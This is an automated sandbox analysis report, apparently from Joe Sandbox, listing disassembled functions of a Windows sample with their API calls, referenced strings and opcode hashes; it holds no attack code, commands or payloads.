Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: bd1f189bf144341e144401031d868632bfed6b538cd84dd1afa6afa9414fe394
Instruction ID: 9e57b3da5f33a9352752c8ff863a05fcc7c6f4a8edc1469103a0fea8918c7702
Opcode Fuzzy Hash: bd1f189bf144341e144401031d868632bfed6b538cd84dd1afa6afa9414fe394
Instruction Fuzzy Hash: 77C146B1608345AFD700DF25C88496BB7E9FF89348F04892DF989AB261DB71ED05CB52

Function 000D7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 000D7A6C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: b498846acc75230f5179cded807a3606565a6cd927a97b040df1638aafafbbf9
Instruction ID: 3dfc678919d37edecde16aea81e317f1d05b088144aa4eff36374d5fcf6abae5
Opcode Fuzzy Hash: b498846acc75230f5179cded807a3606565a6cd927a97b040df1638aafafbbf9
Instruction Fuzzy Hash: 56B18D7190431A9FDB10DFA4C885BBEB7F4EF09321F24442AE509E7352E774A941CBA1

Function 0007FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0007FAA6
OleUninitialize.OLE32(?,00000000), ref: 0007FB45
UnregisterHotKey.USER32(?), ref: 0007FC9C
DestroyWindow.USER32(?), ref: 000B45D6
FreeLibrary.KERNEL32(?), ref: 000B463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000B4668

Strings

close all, xrefs: 0007FAA1

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: fcd2bebdbe04cc38c8ceefea43850b752d2084e59b3724029f2e3df8efcc6aad
Instruction ID: ad2960a90f722e8fcc90be761670730bb4e033f9b1acd77394433e09d3a9899f
Opcode Fuzzy Hash: fcd2bebdbe04cc38c8ceefea43850b752d2084e59b3724029f2e3df8efcc6aad
Instruction Fuzzy Hash: E0A15D30B01212CFDB69EF14C995AB9F3A4BF05710F1582ADE80AAB253DB34AD16CF55

Function 000CA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,000CA439), ref: 000CA377

Strings

CLASSNN, xrefs: 000CA119
NAME, xrefs: 000CA1A9
CLASS, xrefs: 000CA0F6
REGEXPCLASS, xrefs: 000CA13C
INSTANCE, xrefs: 000CA285
TEXT, xrefs: 000CA2AE

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 9fef34008b6a631e169fd12d5c2f30683a81b7e10718e85494635e1deb14ecf6
Instruction ID: 70232fdc50ed4b0f6a56bdf678d25662611ffc5420810e8e71749f946922b8e8
Opcode Fuzzy Hash: 9fef34008b6a631e169fd12d5c2f30683a81b7e10718e85494635e1deb14ecf6
Instruction Fuzzy Hash: 7891C530B00619AACF48EFA4C451FEEFBB4BF05318F54811DE849A7182DB316A99DBD1

Function 00072E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00072EAE

Part of subcall function 00071DB3: GetClientRect.USER32(?,?), ref: 00071DDC
Part of subcall function 00071DB3: GetWindowRect.USER32(?,?), ref: 00071E1D
Part of subcall function 00071DB3: ScreenToClient.USER32(?,?), ref: 00071E45

GetDC.USER32 ref: 000ACD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000ACD45
SelectObject.GDI32(00000000,00000000), ref: 000ACD53
SelectObject.GDI32(00000000,00000000), ref: 000ACD68
ReleaseDC.USER32(?,00000000), ref: 000ACD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000ACDFB

Strings

U, xrefs: 000ACCD0

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 7c08f2ad07ea833cbe9dc5089739aaea21f15fe21bd7ab3f6302367b9d1fb803
Instruction ID: 1d0f59800255c73678a6015dfaa9e583916913ed0cbfe9539040969ee08a84d2
Opcode Fuzzy Hash: 7c08f2ad07ea833cbe9dc5089739aaea21f15fe21bd7ab3f6302367b9d1fb803
Instruction Fuzzy Hash: 3371E531800205DFDF61CFA4C880EFA7BB5FF4A360F15826AED595A2A6C7358C80DB60

Function 000E1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000E1A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000E1A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000E1ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000E1AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000E1AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000E1B10
InternetCloseHandle.WININET(00000000), ref: 000E1B57

Part of subcall function 000E2483: GetLastError.KERNEL32(?,?,000E1817,00000000,00000000,00000001), ref: 000E2498
Part of subcall function 000E2483: SetEvent.KERNEL32(?,?,000E1817,00000000,00000000,00000001), ref: 000E24AD

Strings

, xrefs: 000E1B01

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 5dfb3970f8d62c4e8bfe789480b49dea697a29bf76f63f4a253355fc2e40cff0
Instruction ID: 39b3a6118c61a13ce384ff75de5a10362214ba03fd4a8d991db79d6a6c563e7f
Opcode Fuzzy Hash: 5dfb3970f8d62c4e8bfe789480b49dea697a29bf76f63f4a253355fc2e40cff0
Instruction Fuzzy Hash: 1F4191B1501249BFEB119F51CC89FFEB7ADEF08354F04412AF905AA181E7749E40DBA1

Function 000E8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,000FF910), ref: 000E8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,000FF910), ref: 000E8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 000E8ED6
SysFreeString.OLEAUT32(?), ref: 000E8F00

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 1f2284f0de5a15353bc30bc76323110aa39e8f3a3426e08eda16688fc619a838
Instruction ID: c03bfa44f77b057c745e03f00aab7d2874169e0356434ece2b1b2d1a0e8a04e9
Opcode Fuzzy Hash: 1f2284f0de5a15353bc30bc76323110aa39e8f3a3426e08eda16688fc619a838
Instruction Fuzzy Hash: 89F13771A00209AFDF54DF95C884EEEB7B9FF89314F108598F909AB251DB31AE45CB90

Function 000EF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000EF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000EF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000EF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000EF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000EF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000EFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 000EFA7C
CloseHandle.KERNEL32(?), ref: 000EFAAB
CloseHandle.KERNEL32(?), ref: 000EFB22

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 11bed8b4a0ac01b6423409b5a76cf233fbf13237b02bb3e7c029c22b6b66f118
Instruction ID: d569a27a8ebdfdc19861c7d26ee6a1d2b6cf838fc22e0641e258ab33c468abf2
Opcode Fuzzy Hash: 11bed8b4a0ac01b6423409b5a76cf233fbf13237b02bb3e7c029c22b6b66f118
Instruction Fuzzy Hash: E8E1A0316043429FCB14EF25C891BBEBBE1AF85354F14856DF8999B2A2DB31EC41CB52

Function 000D4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000D466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000D3697,?), ref: 000D468B

Part of subcall function 000D466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000D3697,?), ref: 000D46A4

Part of subcall function 000D4A31: GetFileAttributesW.KERNEL32(?,000D370B), ref: 000D4A32

lstrcmpiW.KERNEL32(?,?), ref: 000D4D40
_wcscmp.LIBCMT ref: 000D4D5A
MoveFileW.KERNEL32(?,?), ref: 000D4D75

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 76e654c59663cba8222c3b6492fc1cf60779913f35c61868bf9c00c8897e2fb0
Instruction ID: 51e918d03e4de9fbe56e23a359040e70886a308491dbcb359f9dea289716776f
Opcode Fuzzy Hash: 76e654c59663cba8222c3b6492fc1cf60779913f35c61868bf9c00c8897e2fb0
Instruction Fuzzy Hash: 955146B24083859BC764EB54DC819DF73ECAF85350F40492FB689D3152EF74A588C766

Function 000F8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000F86FF

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 4fbd4498daca803c973b43540965936bbe21af3f39d0770959557f3b38b36381
Instruction ID: 84f71248f359d137b0a6222b1cc5b8cfca664b0c5ce98221a62b258ed12bf7b9
Opcode Fuzzy Hash: 4fbd4498daca803c973b43540965936bbe21af3f39d0770959557f3b38b36381
Instruction Fuzzy Hash: 82519130604249BEEB209B24CC85FFD7BA5EF05750F608115FB14EA9A1DF75E980EB50

Function 00072B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000AC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000AC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000AC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000AC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000AC370
DestroyIcon.USER32(00000000), ref: 000AC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000AC39C
DestroyIcon.USER32(?), ref: 000AC3AB

Part of subcall function 000FA4AF: DeleteObject.GDI32(00000000), ref: 000FA4E8

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 1a9d364f2a12fec6910da2bfc744fe1d02c258e1abe8af5348077a5b70153c7c
Instruction ID: d91c4cb57233ebfceefe3f9a7d69b6924337d0e453636b64d1848865b4661a7f
Opcode Fuzzy Hash: 1a9d364f2a12fec6910da2bfc744fe1d02c258e1abe8af5348077a5b70153c7c
Instruction Fuzzy Hash: 97515871A00209EFEB20DF65CC45FAE7BE5EF58710F108528F906976A0DB74AD90EB64

Function 000C966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 000CA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 000CA84C
Part of subcall function 000CA82C: GetCurrentThreadId.KERNEL32 ref: 000CA853
Part of subcall function 000CA82C: AttachThreadInput.USER32(00000000,?,000C9683,?,00000001), ref: 000CA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 000C968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000C96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 000C96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 000C96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000C96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000C96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 000C96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000C96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000C96FB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 72543c2d60733f827fdd5716d02631415d3afa280841e869f66c92199747f934
Instruction ID: 47f6e9b90b8e536d1707c22e20e9aae7220b9c2fe906e905e76eb1d42eb9c14c
Opcode Fuzzy Hash: 72543c2d60733f827fdd5716d02631415d3afa280841e869f66c92199747f934
Instruction Fuzzy Hash: 9E11C271910219BFF7106B609C49F7A3A1DEF4C754F100429F244AB1A1CDF25C10EAA4

Function 000C8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,000C853C,00000B00,?,?), ref: 000C892A
HeapAlloc.KERNEL32(00000000,?,000C853C,00000B00,?,?), ref: 000C8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000C853C,00000B00,?,?), ref: 000C8946
GetCurrentProcess.KERNEL32(?,00000000,?,000C853C,00000B00,?,?), ref: 000C894E
DuplicateHandle.KERNEL32(00000000,?,000C853C,00000B00,?,?), ref: 000C8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,000C853C,00000B00,?,?), ref: 000C8961
GetCurrentProcess.KERNEL32(000C853C,00000000,?,000C853C,00000B00,?,?), ref: 000C8969
DuplicateHandle.KERNEL32(00000000,?,000C853C,00000B00,?,?), ref: 000C896C
CreateThread.KERNEL32(00000000,00000000,000C8992,00000000,00000000,00000000), ref: 000C8986

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: b978dd3f952321dcc9ba413678d54fa751956702069105356f62839f7905ab18
Instruction ID: dcde89a07042ba3519a93e4eeffe2ba7637e12766523b02ce6b9b2d13809461d
Opcode Fuzzy Hash: b978dd3f952321dcc9ba413678d54fa751956702069105356f62839f7905ab18
Instruction Fuzzy Hash: 4B01A8B5240309FFE610ABA5DC89F7B3BACFF89711F408425FA05DB6A1CA749810DB21

Function 000E9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 000E9BA4, 000E9EC8
Not an Object type, xrefs: 000E9B7B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 6b6d4b2e2e61da95c7bac6df86c7f47ffd6064b01de7755f1efab6e28e976cce
Instruction ID: 5a1041be5eb8589f39035b9fa8a31507aca5ed2cb38dbc35f77e6761927ca3dd
Opcode Fuzzy Hash: 6b6d4b2e2e61da95c7bac6df86c7f47ffd6064b01de7755f1efab6e28e976cce
Instruction Fuzzy Hash: 2CC1A071A0025A9FDF24DFA9D884BEEB7F5FB48310F148469E905BB281E770AD41CB90

Function 000E9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E9167
VariantInit.OLEAUT32(?), ref: 000E9238
VariantInit.OLEAUT32(?), ref: 000E9339
VariantClear.OLEAUT32(?), ref: 000E9343
VariantClear.OLEAUT32(?), ref: 000E93A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 000E91C8, 000E92F6, 000E93AE
Incorrect Object type in FOR..IN loop, xrefs: 000E931C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 8368179c1b32b8276196881d7fcb0e3f9f26d4b9d1b8531188366f8bb8f01236
Instruction ID: 9116a7ace52a3c2b3203c3e291f5e82af7cfe052f87f6c5666ac82520ae9522b
Opcode Fuzzy Hash: 8368179c1b32b8276196881d7fcb0e3f9f26d4b9d1b8531188366f8bb8f01236
Instruction Fuzzy Hash: E9919E71A00259AFDF24DFA6C848FAEBBB8EF45710F10815DF915BB281D7709A45CBA0

Function 000E975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 000C710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?,?,?,000C7455), ref: 000C7127
Part of subcall function 000C710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?,?), ref: 000C7142
Part of subcall function 000C710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?,?), ref: 000C7150
Part of subcall function 000C710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?), ref: 000C7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 000E9806
_memset.LIBCMT ref: 000E9813
_memset.LIBCMT ref: 000E9956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 000E9982
CoTaskMemFree.OLE32(?), ref: 000E998D

Strings

NULL Pointer assignment, xrefs: 000E99DB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
